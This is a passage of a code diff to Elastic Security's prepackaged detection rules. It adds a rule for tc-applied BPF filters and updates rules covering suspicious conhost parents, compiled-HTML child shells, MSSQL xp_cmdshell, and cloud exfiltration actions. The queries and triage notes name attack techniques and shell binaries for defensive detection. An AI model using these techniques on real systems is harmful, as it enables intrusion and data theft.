"Execution" - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_tc_bpf_filter.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_tc_bpf_filter.json new file mode 100644 index 0000000000000..ba7f8ca63340d --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_tc_bpf_filter.json @@ -0,0 +1,78 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "BPF filter applied using TC", + "query": "process where event.type != \"end\" and process.executable : \"/usr/sbin/tc\" and process.args : \"filter\" and process.args : \"add\" and process.args : \"bpf\" and not process.parent.executable: \"/usr/sbin/libvirtd\"\n", + "references": [ + "https://github.com/h3xduck/TripleCross/blob/master/src/helpers/deployer.sh", + "https://man7.org/linux/man-pages/man8/tc.8.html" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ef04a476-07ec-48fc-8f3d-5e1742de76d3", + "severity": "high", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Execution", + "TripleCross" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json index 72c4a8399a0de..10e988a018e04 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_user_exec_to_pod.json @@ -12,14 +12,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "Kubernetes User Exec into Pod", - "note": "## Config\n\nThe Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:\"kubernetes.audit_logs\" \n and kubernetes.audit.objectRef.resource:\"pods\" \n and kubernetes.audit.objectRef.subresource:\"exec\"\n", + "note": "", + "query": "kubernetes.audit.objectRef.resource:\"pods\" \n and kubernetes.audit.objectRef.subresource:\"exec\"\n", "references": [ "https://kubernetes.io/docs/tasks/debug/debug-application/debug-running-pod/", "https://kubernetes.io/docs/tasks/debug/debug-application/get-shell-running-container/" ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.subresource", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "14de811c-d60f-11ec-9fd7-f661ea17fbce", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json index 4aa2adb6b2dd0..76c2d8b5d86d5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_compiled_html_file.json @@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n process.parent.name : \"hh.exe\" and \n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +78,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -75,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json index 3614ec7bcaf72..945188d9d6c43 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_hidden_shell_conhost.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Conhost Spawned By Suspicious Parent Process", - "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and \n`PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into\nlegitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and\n`PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into\nlegitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"conhost.exe\" and\n process.parent.name : (\"svchost.exe\", \"lsass.exe\", \"services.exe\", \"smss.exe\", \"winlogon.exe\", \"explorer.exe\",\n \"dllhost.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"userinit.exe\", \"wininit.exe\", \"spoolsv.exe\",\n \"wermgr.exe\", \"csrss.exe\", \"ctfmon.exe\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json index 1b2b37bf23469..8d35a95a9cb98 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution via MSSQL xp_cmdshell Stored Procedure", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"cmd.exe\" and process.parent.name : \"sqlservr.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json index 65a0ac959cab8..e27ca82583d3c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json @@ -16,14 +16,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Full Network Packet Capture Detected", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and \nevent.action:(CreateTrafficMirrorFilter or CreateTrafficMirrorFilterRule or CreateTrafficMirrorSession or CreateTrafficMirrorTarget) and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and\nevent.action:(CreateTrafficMirrorFilter or CreateTrafficMirrorFilterRule or CreateTrafficMirrorSession or CreateTrafficMirrorTarget) and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_TrafficMirrorFilter.html", "https://github.com/easttimor/aws-incident-response" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c1812764-0788-470f-8e74-eb4a14d47573", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -67,5 +97,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json index f4d0877ca70b7..06559451114de 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json @@ -15,14 +15,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Snapshot Activity", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS EC2 Snapshot Activity\n\nAmazon EC2 snapshots are a mechanism to create point-in-time references to data that reside in storage volumes. System\nadministrators commonly use this for backup operations and data recovery.\n\nThis rule looks for the modification of snapshot attributes using the API `ModifySnapshotAttribute` action. This can be\nused to share snapshots with unauthorized third parties, giving others access to all the data on the snapshot.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Search for dry run attempts against the resource ID of the snapshot from other user accounts within CloudTrail.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Check if the shared permissions of the snapshot were modified to `Public` or include unknown account IDs.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:ModifySnapshotAttribute\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-snapshot-attribute.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifySnapshotAttribute.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "98fd7407-0bd5-5817-cda0-3fcc33113a56", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -30,7 +55,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Exfiltration" ], "threat": [ { @@ -51,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json index 787cac39c30e4..5ac16e006dc9c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 VM Export Failure", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:CreateInstanceExportTask and event.outcome:failure\n", "references": [ "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e919611d-6b6f-493b-8314-7ed6ac2e413b", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -66,5 +96,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json index ac016370fe1c0..cb65691251ab7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Logging Sink Modification", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.logging.v*.ConfigServiceV*.UpdateSink and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.UpdateSink and event.outcome:success\n", "references": [ "https://cloud.google.com/logging/docs/export#how_sinks_work" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "184dfe52-2999-42d9-b9d1-d1ca54495a61", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json index 146a742b419d0..27ace0dcce5ce 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Transport Rule Creation", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json index b0e311200ce2e..b416ece26692a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json @@ -14,15 +14,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Transport Rule Modification", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json index 0048aae78e28f..bb0f5bcaf6a1a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Snapshot Export", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:StartExportTask and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StartExportTask.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + 